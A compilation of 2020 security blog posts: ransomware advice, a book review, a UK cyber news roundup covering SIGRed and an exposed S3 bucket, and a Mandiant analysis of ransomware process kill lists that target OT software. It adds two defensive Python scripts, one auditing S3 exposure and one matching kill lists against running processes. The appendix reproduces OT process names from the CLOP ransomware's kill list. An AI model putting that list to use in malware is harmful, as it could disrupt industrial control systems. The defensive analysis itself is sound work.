        A cost-effective way of managing all your staff awareness training in one place, the complete suite contains eight e-learning courses to help you transform your employees from threats to assets.

        Find out more

        A version of this blog was originally published on 27 March 2017.

        The post Phishing attacks: 6 reasons why we keep taking the bait appeared first on IT Governance UK Blog.

        Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure

        Cybercriminals tend to keep with the times, as they often leverage current events as a way to harvest user data or spread malicious content. McAfee COVID-19 Threat Report July 2020 points to a rather significant surge in attacks exploiting the current pandemic with COVID-19 themed malicious apps, phishing campaigns, malware, and ransomware. However, what many users don’t realize is that ransomware attacks are a lot more than meets the eye.  

        COVID-19 Themed Ransomware

During the first few months of 2020, the McAfee Advanced Threat Research (ATR) team saw that cybercriminals were targeting manufacturing, law, and construction businesses. After pinpointing their targets, hackers spread COVID-19 themed ransomware campaigns to these companies in an effort to capitalize on the pandemic’s relevance during this time.

An example of one of these attacks in action is Ransomware-GVZ. The ransomware encrypts the organization’s files, displays a lock screen if a user attempts to reboot their device, and presents a ransom note demanding payment in return for decrypting the firm’s compromised systems and the personal and corporate data they contain. As a result, the company is left with a severely crippled network while the criminals behind the attack gain a treasure trove of data – information belonging to consumers that have previously interacted with the business.

         

        Ransomware Could Be the New Data Breach

        As ransomware attacks continue to evolve, it’s not just file encryption that users need to be aware of – they also need to be aware of the impact the attack has on compromised data. Senior Principal Engineer and Lead Scientist Christiaan Beek stated, “No longer can we call these attacks just ransomware incidents. When actors have access to the network and steal the data prior to encrypting it, threatening to leak if you don’t pay, that is a data [infraction].” If a ransomware attack exploits an organization and their network is compromised, so is the data on that network. Hackers can steal this data before encrypting it and use this stolen information to conduct identity theft or spread other misfortune that can affect both the organization’s employees and their customers.  

This surge in ransomware is only compounded by traditional data breaches, which have also spiked in conjunction with the global pandemic. According to the McAfee COVID-19 Threat Report July 2020, the number of reported incidents targeting the public sector, individuals, education, and manufacturing dramatically increased. In fact, McAfee Labs counted 458 publicly disclosed security incidents in the first few months of 2020, with a 60% increase in attacks from Q4 2019 to Q1 2020 in the United States alone. The attacks targeting organizations also impact the consumers who buy from them, as the company’s data consists of its customers’ personal and financial information.

        Don’t Let Your Data Be Taken for Ransom

Because of the high volume of data that’s compromised by ransomware attacks, it’s crucial for consumers to shift how they approach these threats and respond in the same way they would to a data breach. Luckily, there are actionable steps you can take as a consumer to help secure your data.

        Change your credentials

        If you discover that a data leak or a ransomware attack has compromised a company you’ve interacted with, err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks. 

        Take password protection seriously

        When updating your credentials, you should always ensure that your password is strong and unique. Many users utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials. 

        Enable two-factor or multi-factor authentication

Two-factor or multi-factor authentication provides an extra layer of security, as it requires more than one form of verification. This reduces the risk of successful impersonation by hackers, even if your password has already been stolen.

        If you are targeted, never pay the ransom

        It’s possible that you could be targeted individually by a ransomware campaign. If this happens, don’t pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments. 

        Use a comprehensive security solution

        Adding an extra layer of security with a solution such as McAfee® Total Protection, which includes Ransom Guard, can help protect your devices from these cyberthreats.  

        Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

        The post Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure appeared first on McAfee Blogs.

        Book Review: Crime Dot Com, From Viruses to Vote Rigging, How Hacking Went Global

        I had the great delight of reading Geoff White’s new book, “Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global”, I thoroughly recommend it. The book is superbly researched and written, the author’s storytelling investigative journalist style not only lifts the lid on the murky underground world of cybercrime but shines a light on the ingenuity, persistence and ever-increasing global scale of sophisticated cybercriminal enterprises.
        Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global
In Crime Dot Com Geoff takes the reader on a global historic tour of the shadowy cybercriminal underworld, from the humble beginnings with a rare interview with the elusive creator of the ‘Love Bug’ email worm, which caused havoc and panic back in 2000, right up to the alarming modern-day phenomenon of election hacking by nation-state actors.

The book tells the tales of the most notorious hacks in recent history, explaining how they were successfully planned and orchestrated, all wonderfully written in a plain English style that my Luddite mother-in-law can understand. It reveals why cybercrime is not just about the Hollywood stereotype of the lone hacker, eagerly tapping away on a keyboard in the dark finding ingenious ways of exploiting IT systems, but is really about hidden online communities of like-minded individuals with questionable moral compasses, collaborating, and ultimately exploiting innocent people out of billions of pounds.

The book covers the UK’s most notorious cyberattacks, such as the devastating 2017 WannaCry ransomware worm attack on the NHS, and the infamous TalkTalk hack carried out by teenage hackers, delving beyond the media ‘cyber scare’ headlines of the time to bring the reader the full story of what happened. The book also explores the rise and evolution of the Anonymous hacktivist culture and takes a deep dive into the less savoury aspects of criminal activities occurring on the dark web.

As you read about the history of cybercrime in this book, a kind of symbiosis between cybercriminals and nation-state hackers becomes apparent, from Russian law enforcement turning a blind eye to Russian cybercriminals exploiting the West, to both the NSA’s and North Korea’s alleged involvement in creating the heinous WannaCry ransomware worm, and the UK cybercriminal that disabled that attack. The growing number of physical-world impacts caused by cyber-attacks, so-called ‘kinetic’ effects, are also probed in Crime Dot Com: how the sophisticated Stuxnet malware, attributed by the media to the United States, was unleashed to physically sabotage centrifuges at an Iranian uranium enrichment facility in a targeted attack, and why the latest cyber threat actors are targeting Britain’s energy network.

        While this book is an easily digestible read for non-cyber security experts, the book provides cybersecurity professionals working on the frontline in defending organisations and citizens against cyber-attacks, with valuable insights and lessons to be learnt about their cyber adversaries and their techniques, particularly in understanding the motivations behind today's common cyberattacks.
        5 out of 5: A must-read for anyone with an interest in cybercrime

        Cyber Security Roundup for August 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, July 2020.

        The standout hack of July 2020, and possibly of the year, was the takeover of 45 celebrity Twitter accounts, in a bid to scam their millions of followers by requesting Bitcoin in tweets. 
        Twitter confirms internal tools used in bitcoin-promoting attack ...
The high-profile Twitter accounts compromised included Barack Obama, Elon Musk, Kanye West, Bill Gates, Jeff Bezos, Warren Buffett, Kim Kardashian, and Joe Biden. Around £80,000 of Bitcoin was sent to the scammer’s Bitcoin account before Twitter swiftly took action by deleting the scam tweets and blocking every ‘blue tick’ verified Twitter user from tweeting, including me.

While the Twitter hack and scam dominated media headlines around the world, the attack was not the ‘highly sophisticated cyber-attack’ reported by many media outlets, but it was certainly bold and clever. The attackers phoned Twitter administrative staff and blagged (socially engineered) their privileged Twitter account credentials out of them, which in turn gave the attackers access to Twitter’s backend administrative system and to any Twitter account they desired. It is understood this Twitter account access was sold by a hacker on the dark web to a scammer in the days before the attack; the scammer(s) then orchestrated near-simultaneous Bitcoin scam tweets from the high-profile accounts. On 31st July, law enforcement authorities charged three men for the attack, with one of the suspects disclosed as a 19-year-old British man from Bognor Regis.

There was a very serious critical Windows vulnerability disclosed as part of the July 2020 Microsoft ‘Patch Tuesday’ security update release. Dubbed "SIGRed", it is a 17-year-old Remote Code Execution (RCE) vulnerability in the Windows Domain Name System (DNS) server, a component commonly present in Microsoft Windows Server 2008, 2012, 2012 R2, 2016 and 2019. Disclosed as CVE-2020-1350, it was given the highest possible CVSS score of 10.0, which basically means the vulnerability is “easy to attack” and “likely to be exploited”, although Microsoft said it had not seen any evidence of exploitation at the time of the patch release.

Given SIGRed is a wormable vulnerability, it is particularly dangerous: wormable malware could exploit it to spread rapidly over flat networks without any user interaction, as the WannaCry attack did against the NHS and other large organisations. Secondly, because the Windows DNS Server service runs with SYSTEM privileges and is very often hosted on domain controllers, successful exploitation hands the attacker the highest level of privilege on some of the most sensitive servers in an Active Directory estate. CVE-2020-1350 can be mitigated on affected systems either by applying the Windows DNS Server patch Microsoft released (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) or, where patching must wait, by applying the registry workaround Microsoft documented (https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability), which caps the size of DNS responses accepted over TCP by setting the TcpReceivePacketSize value to 0xFF00 under the DNS service’s Parameters key and restarting the DNS service. The workaround should be removed once the patch is in place.

        At least 10 universities in the UK had student data stolen after hackers attacked Blackbaud, an education-focused cloud service provider. UK universities impacted included York, Loughborough, Leeds, London, Reading, Exeter and Oxford. According to the BBC News website, Blackbaud said "In May of 2020, we discovered and stopped a ransomware attack. Prior to our locking the cyber-criminal out, the cyber-criminal removed a copy of a subset of data from our self-hosted environment."

As expected, the UK Government ordered UK mobile network operators to remove all Huawei 5G equipment by 2027, and banned the purchase of Huawei 5G network equipment after 31st December 2020. Digital Secretary Oliver Dowden said it follows sanctions imposed by the United States, which claims the Chinese firm poses a national security threat, which Huawei continues to resolutely deny. The ban is expected to delay the UK’s 5G rollout by a year. "This has not been an easy decision, but it is the right one for the UK telecoms networks, for our national security and our economy, both now and indeed in the long run," he said.
In some media quarters, it was suggested the UK u-turn on Huawei could lead to cyberattack repercussions, after Reuters said its sources confirmed China was behind cyberattacks on Australia’s critical national infrastructure and government institutions following Australia’s trade dispute with China.

The Russian hacking group APT29 was jointly accused of targeting coronavirus vaccine research for theft by the UK NCSC, the Canadian Communications Security Establishment (CSE), the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the US National Security Agency (NSA). The UK’s National Cyber Security Centre (NCSC) said the hackers "almost certainly" operated as "part of Russian intelligence services". It did not specify which research organisations had been targeted, or whether any coronavirus vaccine research data was taken, but it did say vaccine research was not hindered by the hackers. Russia’s ambassador to the UK rejected the allegations: "I don’t believe in this story at all, there is no sense in it," Andrei Kelin told the BBC’s Andrew Marr Show. Foreign Secretary Dominic Raab, meanwhile, said it is "very clear Russia did this", adding that it is important to call out this "pariah-type behaviour".

UK sport said hackers tried to steal a £1 million club transfer fee and froze turnstiles at a football game. Cybercriminals hacked a Premier League club managing director’s email account during a player transfer negotiation; the million-pound theft was only thwarted by a last-minute intervention by a bank. Another English football club was targeted by a ransomware attack which stopped its turnstiles and CCTV systems from working, and nearly resulted in a football match being postponed. Common tactics used by hackers to attack football clubs include compromising email accounts, cyber-enabled fraud and ransomware to shut down digital systems. For further information on this subject, see my extensive blog post on football club hacking, The Billion Pound Manchester City Hack.

Smartwatch maker Garmin had its website, mobile app and customer service call centres taken down by ransomware on 23rd July 2020. Reports suggest the fitness brand had been hit by the WastedLocker ransomware strain, which is said to have been developed by individuals linked to a Russia-based hacking group called ‘Evil Corp’. According to Bleeping Computer, Garmin paid $10 million to the cybercriminals to receive decryption keys for the malware on 24th or 25th July 2020.

Yet another big data exposure caused by a misconfigured AWS S3 bucket was found by security researchers: one million files belonging to the fitness brand ‘V Shred’ were discovered exposed to the world, including the personal data of 99,000 V Shred customers. Interestingly, V Shred pushed back on the researchers’ findings by claiming it was necessary for user files to be publicly available, and denied that any PII had been exposed.
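A "misconfigured bucket" is almost always one of three things: an ACL grant to a predefined public group, a bucket policy that allows any principal without a condition, or Block Public Access left off so that either of the first two actually takes effect. The script below is an added example (not from the roundup, from V Shred or from AWS) that evaluates the three documents the S3 API returns for a bucket (GetBucketAcl, GetBucketPolicy, GetPublicAccessBlock) offline and separates "objects are intentionally readable" from "anyone can list the bucket". The sample ACL, policy and Block Public Access settings are constructed; the bucket name and VPC endpoint ID in them are placeholders.

```python
"""Offline check of an S3 bucket's public exposure from three API documents:
GetBucketAcl, GetBucketPolicy and GetPublicAccessBlock. Added example; the
sample documents at the bottom are constructed, not any real bucket's config."""
import json

# Predefined S3 groups meaning "everyone" (anonymous) or "any AWS account".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return (group, permission) for every ACL grant to a public group.
    READ on the bucket ACL lets anyone enumerate object keys, the classic exposure."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((PUBLIC_GROUPS[grantee["URI"]], grant.get("Permission")))
    return hits


def _wildcard_principal(principal):
    """True for Principal "*" or {"AWS": "*"} (also when "*" sits inside a list)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy):
    """Return (Sid, sorted actions) for unconditional Allow statements open to any principal.
    Wildcard statements that carry a Condition (e.g. aws:SourceVpce) narrow the audience;
    they are left for manual review rather than flagged automatically."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be written without a list
        statements = [statements]
    hits = []
    for idx, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow" or not _wildcard_principal(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        hits.append((stmt.get("Sid", f"Statement[{idx}]"), sorted(actions)))
    return hits


def assess_bucket(acl, policy, public_access_block=None):
    """Combine the three documents. Block Public Access wins where it applies:
    IgnorePublicAcls makes public ACL grants inert, and RestrictPublicBuckets denies
    anonymous access through a public bucket policy."""
    pab = public_access_block or {}
    acl_hits = [] if pab.get("IgnorePublicAcls") else public_acl_grants(acl)
    policy_hits = [] if pab.get("RestrictPublicBuckets") else public_policy_statements(policy)
    return {"public": bool(acl_hits or policy_hits), "acl": acl_hits, "policy": policy_hits}


# Constructed sample documents in the shapes the S3 API returns (placeholder identifiers).
SAMPLE_ACL = {
    "Owner": {"ID": "ownercanonicalid"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "ownercanonicalid"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::example-bucket",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-example"}}}
  ]
}""")
PAB_OFF = {"BlockPublicAcls": False, "IgnorePublicAcls": False,
           "BlockPublicPolicy": False, "RestrictPublicBuckets": False}
PAB_ON = {key: True for key in PAB_OFF}

if __name__ == "__main__":
    print(assess_bucket(SAMPLE_ACL, SAMPLE_POLICY, PAB_OFF))
    print(assess_bucket(SAMPLE_ACL, SAMPLE_POLICY, PAB_ON))
```

With Block Public Access off, the sample is flagged twice: the AllUsers READ grant (bucket listing) and the unconditional PublicRead statement. Turning all four Block Public Access settings on makes the same ACL and policy inert, which is why the account-level setting is the first thing to check when a bucket like this turns up.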


        Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families

        Mandiant Threat Intelligence has researched and written extensively on the increasing financially motivated threat activity directly impacting operational technology (OT) networks. Some of this research is available in our previous blog posts on industrial post-compromise ransomware and FireEye's approach to OT security. While most of the actors behind this activity likely do not differentiate between IT and OT or have a particular interest in OT assets, they are driven by the goal of making money and have demonstrated the skills needed to operate in these networks. For example, the shift to post-compromise ransomware deployment highlights the actors’ ability to adapt to more complex environments.

        In this blog post we look further into this trend by examining two different process kill lists containing OT processes which we have observed deployed alongside a variety of ransomware samples and families. We think it is likely that these lists were the result of coincidental asset scanning in victim organizations and not specific targeting of OT. While this judgement may initially seem like good news to defenders, this activity still indicates that multiple, very prolific, financially motivated threat actors are active inside organizations’ OT—based on the contents of these process kill lists—with the intent of profiting from the ransom of stolen information and disrupted services.

        Two Unique Process Kill Lists Deployed Alongside Seven Ransomware Families Include OT Processes

Threat actors often deploy process kill lists alongside or as part of ransomware to terminate anti-virus products, stop alternative detection mechanisms, and release file locks so that critical data can be encrypted. As a result, the deployment of these lists increases the likelihood of a successful attack (MITRE ATT&CK T1489, Service Stop). In post-compromise ransomware attacks, attackers regularly tailor the lists to include processes that are relevant to the victim’s environment. By stopping these processes, the attacker makes sure to encrypt data from critical systems whose files would otherwise be held open, and therefore skipped, while the owning process is running. As the likelihood of crippling critical systems increases, the target is more likely to suffer impacts on its physical production.

        First Process Kill List Has Been Leveraged By At Least Six Ransomware Families

Mandiant identified samples of at least six ransomware families (DoppelPaymer, LockerGoga, Maze, MegaCortex, Nefilim and SNAKEHOSE), all of which have been associated with high-profile incidents impacting industrial organizations over the past two years, that have leveraged a common process kill list containing 1,000+ processes. The list, which we briefly discussed in an earlier blog post from February 2020, includes a couple dozen processes related to OT executables, mainly from General Electric Proficy, a suite used for historians and human-machine interfaces (HMIs). We note that while the inclusion of these processes in this kill list could result in limited loss of view of historical process data, it is not likely to directly impact the operator’s ability to control the physical process itself.


        Figure 1: Snippets from “kill.bat” deployed alongside LockerGoga (L) and MegaCortex process kill list (R)

The earliest iteration we identified of the shared kill list was a batch script deployed alongside LockerGoga (MD5: 34187a34d0a3c5d63016c26346371b54) in January 2019 (Figure 1). Other iterations of the list we have observed are hardcoded directly into the ransomware binaries. The different techniques used to deploy the process kill list, the use of different malware families, and slight variations between each list iteration (mainly typos in the process names, e.g.: a2guard.exea2start.exe; nexe; proficyclient.exe) indicate that more than one actor likely had access to the true source of the process kill list. This source could be, for example, a list of processes posted on a dark web forum, or an independent actor sharing the compiled list with other actors.

        We think it is likely that the OT processes identified in this list simply represent the coincidental output of automated process collection from victim environment(s) and not a targeted effort to impact OT. This is supported by the relatively limited and specific selection of OT-related processes, rather than a broader selection of many vendors and OT-related processes that would have been suggestive of targeted external research. Regardless, this does not downplay the significance of the inclusion of OT processes in the list, as it suggests that sophisticated financially motivated actors, such as FIN6, have had at least some visibility into a victim’s OT network. As a result, the actors were able to tailor their malware to impact those systems, without the explicit intent to target OT assets.

Most types of ransomware attacks in OT environments will result in the disruption of services and a temporary loss of view into current and historical process data. However, OT environments impacted by ransomware that leverages this kill list, and that happen to be running one or more of the processes used by the initial victim(s) (and therefore included on the list), may face additional impacts. For example, historian databases would be more likely to be encrypted, possibly resulting in loss of historical data. Other impacts could include gaps in the collection of process data corresponding to the duration of the outage and temporary loss of access to licensing rights for critical services.

        Second List Deployed Alongside CLOP Ransomware Sample Has a Higher Chance of Impacting OT Systems

Mandiant analyzed a second, entirely unrelated sample of ransomware (MD5: 3b980d2af222ec909b948b6bbdd46319) from the CLOP family with a hardcoded list for enumeration and termination of processes that includes a number of OT strings. The list contains over 1,425 processes, of which at least 150 belong to OT-related software suites (Figure 2 and Appendix).

        Based on our analysis, the CLOP malware family’s process kill list has grown over time possibly as more processes are scanned during different compromises. While we do not currently hold enough information to describe the exact mechanism used by the actor to grow the list, it appears to have resulted from actor reconnaissance across multiple victims. We have observed the threat actor employing process discovery procedures, including running the tasklist utility. This indicates that the actor scanned for processes in at least one victim’s OT network(s) before deploying the ransomware.


        Figure 2: Subset of processes in observed CLOP sample
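The cross-referencing described above, written out as an added example (not Mandiant's tooling): it normalises a kill list, groups its entries by OT vendor using a subset of the vendor/process mapping from the appendix, and then checks a host's `tasklist /FO CSV` output against that kill list to show which running processes the ransomware would actually terminate. The kill list and the tasklist output are constructed sample data; the catalog is a small arbitrary selection of real process names from the appendix.

```python
"""Cross-reference a ransomware process kill list against an OT software
catalog, then check a host's running processes against that list.

Added example, not Mandiant's tooling. OT_CATALOG is a subset of the
appendix mapping (process image name -> vendor); SAMPLE_KILL_LIST and
SAMPLE_TASKLIST_CSV are constructed sample data.
"""
import csv
import io
from collections import defaultdict

# Real process names from the appendix; the selection is arbitrary.
OT_CATALOG = {
    "TCATSYSSRV.EXE": "Beckhoff",
    "TCEVENTLOGGER.EXE": "Beckhoff",
    "SERVER_RUNTIME.EXE": "Kepware",
    "SERVER_EVENTLOG.EXE": "Kepware",
    "NIDMSRV.EXE": "National Instruments",
    "NIMXS.EXE": "National Instruments",
    "OPCUALDS.EXE": "OPC",
    "CCARCHIVEMANAGER.EXE": "Siemens",
    "CCREDUNDANCYAGENT.EXE": "Siemens",
    "HMIRTM.EXE": "Siemens",
    "OPCUASERVERWINCC.EXE": "Siemens",
    "WINCCEXPLORER.EXE": "Siemens",
    "S7OIEHSX64.EXE": "Siemens",
    "PLCENGINEI64.EXE": "Tani",
}

# Constructed kill list: a few catalog entries mixed with generic entries
# standing in for the ordinary business software that makes up most of a
# real list. Case and whitespace are deliberately inconsistent.
SAMPLE_KILL_LIST = """
sqlservr.exe
outlook.exe
  CcArchiveManager.exe
hmirtm.exe
SERVER_RUNTIME.EXE
tcatsyssrv.exe
opcualds.exe
excel.exe
unknownvendorsvc.exe
"""


def normalise(name: str) -> str:
    """Upper-case the image name and drop any directory component."""
    name = name.strip().replace("\\", "/").rsplit("/", 1)[-1]
    return name.upper()


def load_kill_list(text: str) -> list:
    """Split a newline-delimited process list into normalised names."""
    return [normalise(line) for line in text.splitlines() if line.strip()]


def classify_kill_list(kill_list, catalog=OT_CATALOG) -> dict:
    """Group kill-list entries by OT vendor; non-catalog entries go under 'other'."""
    by_vendor = defaultdict(list)
    for proc in kill_list:
        by_vendor[catalog.get(proc, "other")].append(proc)
    return dict(by_vendor)


def ot_fraction(kill_list, catalog=OT_CATALOG) -> tuple:
    """Return (ot_count, total) for a kill list."""
    return sum(1 for p in kill_list if p in catalog), len(kill_list)


# Constructed `tasklist /FO CSV` output from a hypothetical WinCC host.
# The column layout is tasklist's real CSV layout; the process set is invented.
SAMPLE_TASKLIST_CSV = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"System Idle Process","0","Services","0","8 K"
"svchost.exe","812","Services","0","21,532 K"
"CCArchiveManager.exe","2044","Console","1","88,120 K"
"HmiRTm.exe","2100","Console","1","140,004 K"
"OpcUaServerWinCC.exe","2210","Console","1","55,300 K"
"explorer.exe","3120","Console","1","60,112 K"
'''


def parse_tasklist_csv(text: str) -> list:
    """Return normalised image names from `tasklist /FO CSV` output."""
    reader = csv.DictReader(io.StringIO(text))
    return [normalise(row["Image Name"]) for row in reader]


def exposed_processes(running, kill_list, catalog=OT_CATALOG) -> dict:
    """Running processes the kill list would terminate, keyed by vendor.

    Being in the catalog is not enough: a process is only reported if it is
    both running on the host and present in the kill list.
    """
    targets = set(kill_list)
    hits = defaultdict(list)
    for proc in running:
        if proc in targets:
            hits[catalog.get(proc, "other")].append(proc)
    return dict(hits)


if __name__ == "__main__":
    kl = load_kill_list(SAMPLE_KILL_LIST)
    ot, total = ot_fraction(kl)
    print(f"{ot} of {total} kill-list entries match the OT catalog")
    for vendor, procs in sorted(classify_kill_list(kl).items()):
        print(f"  {vendor}: {', '.join(procs)}")
    running = parse_tasklist_csv(SAMPLE_TASKLIST_CSV)
    print("Would be terminated on this host:", exposed_processes(running, kl))
```

In the sample, OPCUASERVERWINCC.EXE is running and is an OT process, but it is not on the constructed kill list, so it is not reported as exposed; only the two WinCC processes that appear on both sides are. To use this against a real sample, feed `load_kill_list` the strings extracted from the binary and `parse_tasklist_csv` the output of `tasklist /FO CSV` from an HMI or engineering workstation.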

        CLOP is also interesting because we have observed only a single, very prolific financially motivated threat actor using the malware family. The group, which has been active since at least 2016 and potentially as early as 2014, is known for operating large phishing campaigns to distribute malware and typically monetizes intrusions through ransomware deployment. Given its versatility and long history in financially motivated intrusions, the actor's activity in OT networks is likely no more than an additional step in its monetization process. However, the actor's financial motivation again does not imply low risk to OT. Our analysis of the CLOP sample's kill list indicates that the included processes have greater potential to disrupt OT systems than those in the shared list described above.

        Unlike the first kill list, the CLOP sample includes a list of processes that, if stopped, may directly impact the operator’s ability to both visualize and control production. This is especially true in the case of some included processes that support HMI and PLC supervision. Some of the OT processes present in the CLOP sample are related to the following products:

        Vendor | Product | Description
        Siemens | SIMATIC WinCC | SCADA system, common for process control and automation.
        Beckhoff | TwinCAT | Software for PC-based process control and automation.
        National Instruments | Data Acquisition Software (DAQ) | Software used to acquire data from sensors and conditioning devices.
        Kepware | KEPServer EX | Software platform that collects information from industrial devices and sends the output to SCADA applications.
        OPC Unified Architecture (OPC-UA) | N/A | Communication protocol for data acquisition and exchange between industrial equipment and enterprise systems.

        Table 1: Examples of products related to OT processes included in identified CLOP kill list

        While the physical processes this software controls would likely continue to operate even if the software processes were terminated unexpectedly, stopping the processes on the CLOP sample's kill list could result in loss of view and control over those physical processes, because operators would no longer be able to interact with the equipment. This can be caused not only by the ransomware's disruption of intermediary systems, but also by the loss of access to files on HMIs and engineering workstations (EWS) that process control and monitoring software needs to run, such as configuration or project files. Without offline backups this can prolong the mean time to recovery (MTTR) of impacted environments. The CLOP sample's list also names specialized processes for software application design and testing, whose files may likewise be corrupted at the time of encryption.

        Process Kill Lists Are Just An Observable Indicating Broader Financially Motivated Interest In OT

        Financially motivated threat actors leverage a large variety of tactics and techniques to obtain data that they can later use to generate profits. While financial actors have historically posed little to no threat to OT systems, the recent uptick in ransomware and extortion incidents highlights that industrial operations are increasingly at risk. Although we have not observed any financially motivated actors explicitly targeting OT systems, our research into process kill lists deployed with or alongside ransomware samples shows that at least two sophisticated financial actors have expanded their access into OT networks during their regular intrusions.

        This increasing exposure of OT to financially motivated threat activity is no surprise, given that TTPs used by cybercriminals increasingly resemble those employed by sophisticated actors. We have consistently conveyed this message since at least 2018, when we publicly discussed the commodity and custom IT tools leveraged by the TRITON attacker while traversing its targets' networks (Figure 3).

        Figure 3: TTPs seen across both IT and OT incidents

        The likelihood of financially motivated actors impacting OT while seeking to monetize intrusions will continue to rise for the following reasons:

        • Financially motivated threat actors moving to a post-compromise ransomware model will continue to evolve and find ways to reach the most critical systems of organizations as part of their mission of monetization. As these actors are mainly driven by profits, they are not likely to differentiate between IT and OT assets.
        • OT organizations will continue to struggle to evolve at the same pace as cyber criminals. As a result, small weaknesses such as misconfigurations, exposed vulnerabilities or improper segmentation will be enough for financial actors to gain access to networks in their attempts to profit from intrusions.
        • As the market for OT solutions continues to incorporate IT services and features into broadly adopted products, we expect the convergence of technologies to result in a broader attack surface for financial threat actors to target.
        • The TTPs employed by both financial and sophisticated nation-state actors often rely on intermediary systems as stepping stones through intrusions. As a result, both groups have similar potential for reaching OT systems, even when financial groups may only do so coincidentally or as part of their monetization strategy.

        Outlook

        As OT networks continue to become more accessible to threat actors of all motivations, security threats that have historically impacted primarily IT are becoming more commonplace. This normalization of OT as just another network from the threat actor perspective is problematic for defenders for many of the reasons discussed above. This recent threat activity should be taken as a wake-up call for two main reasons: the various security challenges commonly faced by organizations to protect OT networks, and the significant consequences that may arise from security compromises even when they are not explicitly designed to target production systems. Asset owners need to look at OT security with the mindset that it is not if you will have a breach, but when. This shift in thinking will allow defenders to better prepare to respond when an incident does happen, and can help reduce the impact of an incident by orders of magnitude.   

        Appendix: Selection Of OT Processes From CLOP Kill List

        Process Name | Vendor
        ACTLICENSESERVER.EXE | Atlas Copco
        TCATSYSSRV.EXE | Beckhoff
        TCEVENTLOGGER.EXE | Beckhoff
        TCR.EXE | Beckhoff
        ALARMMANAGER.EXE | GE
        S2.EXE | Honeywell
        BR.ADI.DISPLAY.BRIGHTNESS.EXE | B&R
        BR.ADI.SERVICE.EXE | B&R
        BR.ADI.UPS.MANAGER.EXE | B&R
        BR.ADI.UPS.SERVICE.EXE | B&R
        BR.AS.UPGRADESERVICE.EXE | B&R
        BRAUTHORIZATIONSVC.EXE | B&R
        BRTOUCHSVC.EXE | B&R
        OPCROUTER4SERVICE.EXE | Inray Industriesoftware
        OPCROUTERCONFIG.EXE | Inray Industriesoftware
        SERVER_EVENTLOG.EXE | Kepware
        SERVER_RUNTIME.EXE | Kepware
        NICELABELAUTOMATIONSERVICE2017.EXE | NiceLabel
        NICELABELPROXY.EXE | NiceLabel
        NICELABELPROXYSERVICE2017.EXE | NiceLabel
        APPLICATIONWEBSERVER.EXE | National Instruments
        CWDSS.EXE | National Instruments
        NIAUTH_DAEMON.EXE | National Instruments
        NIDEVMON.EXE | National Instruments
        NIDISCSVC.EXE | National Instruments
        NIDMSRV.EXE | National Instruments
        NIERSERVER.EXE | National Instruments
        NILXIDISCOVERY.EXE | National Instruments
        NIMDNSRESPONDER.EXE | National Instruments
        NIMXS.EXE | National Instruments
        NIPXICMS.EXE | National Instruments
        NIROCO.EXE | National Instruments
        NISDS.EXE | National Instruments
        NISVCLOC.EXE | National Instruments
        NIWEBSERVICECONTAINER.EXE | National Instruments
        SYSTEMWEBSERVER.EXE | National Instruments
        OPC.UA.DISCOVERYSERVER.EXE | OPC
        OPCUALDS.EXE | OPC
        ANAWIN.EXE | AUTEM
        ASM.EXE | Possibly Siemens
        PARAMETRIC.EXE | PTC
        QDAS_O-QIS.EXE | Q-Das
        QDAS_PROCELLA.EXE | Q-Das
        QDAS_QS-STAT.EXE | Q-Das
        QDASIDI_SRV.EXE | Q-Das
        SPCPROCESSLINK.EXE | Q-Das
        TAGSRV.EXE | Rockwell Automation or National Instruments
        _SIMPCMON.EXE | Siemens
        ALMPANELPLUGIN.EXE | Siemens
        ALMSRV64X.EXE | Siemens
        ALMSRVBUBBLE64X.EXE | Siemens
        CC.TUNNELSERVICEHOST.EXE | Siemens
        CCAEPROVIDER.EXE | Siemens
        CCAGENT.EXE | Siemens
        CCALGRTSERVER.EXE | Siemens
        CCARCHIVEMANAGER.EXE | Siemens
        CCCAPHSERVER.EXE | Siemens
        CCCSIGRTSERVER.EXE | Siemens
        CCDBUTILS.EXE | Siemens
